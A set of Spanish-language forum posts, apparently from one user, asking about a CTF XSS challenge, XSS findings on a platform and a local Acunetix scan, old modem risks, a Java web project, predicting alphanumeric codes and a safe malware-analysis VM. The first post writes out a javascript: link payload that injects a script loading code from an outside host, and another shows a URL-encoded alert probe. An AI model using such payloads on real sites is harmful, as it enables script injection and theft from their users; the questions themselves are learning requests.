Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>


He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?


Gracias
Saludos!!

Hola buenas tardes, estoy probando una plataforma y tengo una duda acerca de XSS, he mandado el Alert y entrega una respuesta 200. pero no me muestra ninguna alerta, la pagina queda en blanco.





Se puede decir que esta url es vulnerable a XSS o realmente no?




Debo admitir que al realizar la alerta tuve un error de dedo y puse mal la función .json y me mostro un error de CakePHP, supongo que esto esta de mas, pero me gustaría saber si puedo explotarlo de alguna manera.





¿Alguna recomendacion?



Gracias

Bueno en mi casa tengo internet por medio de un Módem DSL de Telmex, tengo una contraseña fuerte y no tengo WPS activo, pero es un modelo viejo y al parecer tiene varias vulnerabilidades.

¿Que peligros puede tener esto?

Es posible que desde otro país se pueda acceder a mi Módem y hacerme MITM?

En caso de que alguien accediera al Módem de manera remota que ataque pudieran usar en mis equipos?

Gracias saludos

Buenas tardes estuve indagando en el apartado de wargames del foro pero no encontre ningun reto forense en español, alguien tendra alguno por ahi para practicar un poco?


Gracias saludos!

Buenas tardes, actualmente estoy intentado crear un proyecto en netbeans en java web.

Mi proyecto consiste en dar usuarios y contraseñas ya definidas y que cada usuario tenga la opcion de seleccionar una cancion de una lista y reproducirla y guardar la eleccion de cada usuario. Como podria hacer este proyecto tengo entendido que se tendria que usar manejo de sesiones. Pero alguien me podria dar una ayuda


Gracias

Hola buenas tardes, me gustaria preguntar e informarme acerca de los juegos online en javascript son juegos seguros? son faciles de modificar?  Que hace que un juego en javascript sea seguro?

Bueno me gustaría conocer la secuencia de una serie alfanumerica.
Me gustaria  saber si estoy haciendolo correctamente, lo primero que estoy intentando es recopilar información por ejemplo se que los Codigos Alfanumericos son de 10 caracteres,creo que el siguiente paso es conocer el charset pero no se cuantas muestras necesito. Tambien se que son 50,474,440 combinaciones dentro de la secuencia final.

Un Ejemplo de las Muestras


79JHZHZF2N
6LQP3XT3YD
WRVDNWNRKD
KV36TVN57W



¿Que me recomiendan seguir haciendo o que pasos pueden ayudar?


Gracias Saludos

Bueno vi un juego muy interesante en facebook, no soy mucho de juegos de navegador de hecho es el primero que juego despues de muuucho tiempo unos 7 años y me ha sorprendido el rendimiento, pero al parecer como ya se usa html5 en vez del flashplayer creo que ayuda mucho. Mi pregunta es como puedo saber en que esta hecho dicho juego?

Gracias

Hola buenas tardes, he estado probando con acunetix en un servidor local, para ver sus vulnerabilidades y al hacerlo acunetix me da aprox 160 Errores potenciales con Cross Site Scripting (Verified) en /.

Despues de probar con el ya clasico <script>alert("XSS")</script> no me da el mensaje que espero, en su lugar me da un error asi

/?module=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E


Es acaso que no es vulnerable ante XSS y es un falso positivo o algo estoy haciendo mal?

Gracias

Buenas tardes, de que manera puedo crear una maquina virtual para infectar continuamente con malware para analizar, sin que se vea afectada mi maquina principal.

Ya que una vez me sucedio que al hacer pruebas en la maquina virtual se infecto mi equipo fisico, posiblemente por una mala configuracion.

Gracias